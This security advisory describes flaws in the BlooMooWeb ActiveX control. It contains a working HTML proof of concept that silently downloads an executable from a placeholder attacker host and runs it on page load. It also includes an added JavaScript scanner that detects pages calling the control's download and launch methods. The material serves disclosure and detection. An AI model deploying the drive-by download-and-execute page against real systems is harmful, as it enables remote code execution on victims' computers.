40 lines
No EOL
1 KiB
HTML
source: https://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue.

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
    aa1=o2obj.GetInstallationDir(null);
    aa2="BlooMooWEB.exe";
    o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
    if(msgCode == 'DOWNLOAD_COMPLETE' )
    {
        o2obj.BW_LaunchGame("treleferekuku");
    }
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>
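
A defender-side check built from the identifiers in the proof of concept above, as an added example that is not part of the original advisory: it flags HTML that loads the control by its CLSID and calls BW_DownloadFile and BW_LaunchGame on it. The function names, verdict labels and sample pages are assumptions made for illustration.

```javascript
// Identifiers taken from the proof of concept on this page.
const BLOOMOO_CLSID = "22E9EFBA-114C-4DA0-AE72-D8F2C7138002";
const RISKY_METHODS = ["BW_DownloadFile", "BW_LaunchGame"];

// Return the id of every <object> tag that loads the control. Tolerates case,
// quoting, optional braces and a tag with no closing ">" (as in the PoC).
function findControlIds(html) {
  const ids = [];
  for (const [tag] of html.matchAll(/<object\b[^<]*/gi)) {
    const clsid = /classid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})/i.exec(tag);
    if (!clsid || clsid[1].toUpperCase() !== BLOOMOO_CLSID) continue;
    const id = /\bid\s*=\s*["']?([\w$]+)/i.exec(tag);
    ids.push(id ? id[1] : null);
  }
  return ids;
}

// Report whether the page loads the control and which risky methods it calls.
// Verdict labels are hypothetical names chosen for this example.
function scanHtml(html) {
  const objectIds = findControlIds(html);
  const calls = [];
  for (const method of RISKY_METHODS) {
    const re = new RegExp("([\\w$]+)\\s*\\.\\s*" + method + "\\s*\\(", "g");
    for (const m of html.matchAll(re)) {
      calls.push({ method, receiver: m[1], onControl: objectIds.includes(m[1]) });
    }
  }
  const hit = (name) => calls.some((c) => c.method === name && c.onControl);
  let verdict = "clean";
  if (objectIds.length > 0) verdict = "control-loaded";
  if (hit("BW_DownloadFile") && hit("BW_LaunchGame")) verdict = "download-and-launch";
  return { verdict, objectIds, calls };
}

// Constructed samples (not captured traffic); example.invalid is a placeholder.
const SUSPICIOUS = `<script>function go(){ ctl.BW_DownloadFile("http://example.invalid/f",
  "x", "cb"); } function cb(c){ ctl . BW_LaunchGame("x"); }</script>
<object id='ctl' classid="clsid:{22e9efba-114c-4da0-ae72-d8f2c7138002}"></object>`;
const BENIGN = `<object id="player" classid="clsid:00000000-0000-0000-0000-000000000000">
</object><script>player.BW_LaunchGame("demo");</script>`;

console.log(scanHtml(SUSPICIOUS).verdict, scanHtml(BENIGN).verdict);
```

The scan is a static string match, so script that builds the method names or the `<object>` tag at run time will not be seen; treat a "clean" result as absence of the literal pattern only.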